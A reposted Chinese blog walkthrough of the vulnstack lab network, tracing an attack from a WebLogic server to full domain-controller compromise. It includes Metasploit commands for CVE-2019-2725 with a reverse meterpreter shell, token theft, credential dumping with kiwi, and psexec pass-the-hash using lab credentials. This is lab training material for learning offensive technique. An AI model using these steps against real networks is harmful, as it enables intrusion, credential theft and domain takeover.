标签：CK 实战 windows token 192.168 漏洞 ATT 然后 10.10

vlunstack是红日安全团队出品的一个实战环境，具体介绍请访问：漏洞详情

拓扑结构大体如下：
 

环境搭建

Kali

ip:192.168.111.135

Web

Ip1:192.168.111.80

Ip2:10.10.10.80

os:windows 2008

应用:weblogic 10.3.6 mssql 2008

Pc

Ip1:192.168.111.201

Ip2:10.10.10.201

Os:windows7

DC

ip:10.10.10.10

os:windows 2012

应用:AD域

内网:10.10.10.0/24

外网:192.168.111.0/24

从web机开始渗透, 这里需要手动开启服务,在C:

\Oracle\Middleware\user_projects\domains\base_domain\bin 有一个startweblogic的批处理, 然后管理员身份运行

账号/密码:Administrator/1qaz@WSX

外网渗透

• 先开始nmap扫描一下192.168.111.0/24存活主机

然后对80 主机进行信息收集扫描

通过445端口开放就存在smb服务可能还会有ms17-010/端口溢出漏洞.

 

开放139端口 就纯真samba服务 于是判断可能会有/远程命令执行漏洞

 

开放1433端口 就存在mssql服务 有可能存在爆破/注入/SA弱口令

 

开放3389 那就是远程桌面喽

 

7001端口 百度了一下得知是 weblogic服务

 

weblogicScan进行扫描漏洞

然后百度了一下 CVE-2019-2725漏洞

CVE-2019-2725是一个 weblogic反序列化远程命令执行漏洞，这个漏洞依旧是根据weblogic的xmldecoder（xml解码器）反序列化漏洞

然后通过msf查看一下漏洞利用脚本

然后进入开始利用模块

use exploit/multi/misc/weblogic_deserialize_asyncresponseservice 进入CVE-2019-2725攻击漏洞模块

set target windows      这个模块默认是unix 所以我们的目标是windows 所以 改一下即可

Set payload  windows/x64/meterpreter/reverse_tcp 

set LHOST 192.168.111.135

Set rhosts 192.168.111.80  要攻击目标

run

 

本来想直接提权,但是发现不能提system权限

system权限

方法1.

然后通过显示进程pid 然后用 migrate 进行进程迁移 获得system权限

方法2.

还可以通过令牌窃取的方式进行提权

load incognito             #加载incognito(伪装)

Getuid                         #查看当前token

list_tokens -u              #列出可用token

 impersonate_token "NT AUTHORITY\\SYSTEM"     #token窃取，格式为impersonate_token"主机名\\用户名"

rev2self                      #返回之前的token

然后使用 kiwi 获取 hash 账号密码

然后获得了域里的用户和密码 下面使用用户密码进行远程登录

开始第二阶段的信息搜集

Net  config workstation  #查域信息

得到域信息 还有10.10.10.0/24网段

设置一条通往10.10.10.0/24网段的路由

然后设置代理

使用use post/windows/gather/arp_scanner模块

扫描网段存活主机

然后又通过web 进行信息收集了一下

得知 10.10.10.10 就是域控

域成员 处理web  还有一个PC机

然后判断PC ip是10.10.10.201

下面渗透pc域用户

方法一

首先用kali生成一个payload

然后通过web机 上传到 10.10.10.201c盘

先上传到web里

 

再控制WEB主机与PC建立一个ipc$连接：

net use \\10.10.10.201\ipc$ "lbb1111.." /user:administrator

然后把刚才上传的文件copy到10.10.10.201 c盘

 

然后再meterpreter中载入powershell模块

在powershell里面执行如下命令，控制WEB主机使用DCOM在远程机器PC上执行刚刚上传到PC主机C盘里的木马：

 

然后从新开启一个msf 监听生成的 payload 1520 端口

 

成功反弹

下面开始提权

方法二

代理nmap扫描10.10.10.201

使用 exploit/windows/smb/psexec模块进行哈希传递

由于一开始再web机得知了域\用户\密码

说以就可以用这个模块直接打了

Set smbdomain  DE1AY  #域

Set smbuser  administrator # 域用户

Set smbpass  lbb1111..     #域用户密码

直接system权限

通过扫描得知3389是开哒

然后尝试一下代理远程能不能直接登录

• 向DC 域控发起进攻

同样直接利用msf的exploit/windows/smb/psexec模块进行哈希传递

拿下域控制器 并且是system权限

标签：CK,实战,windows,token,192.168,漏洞,ATT,然后,10.10
来源： https://blog.csdn.net/m0_63206880/article/details/122096271

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。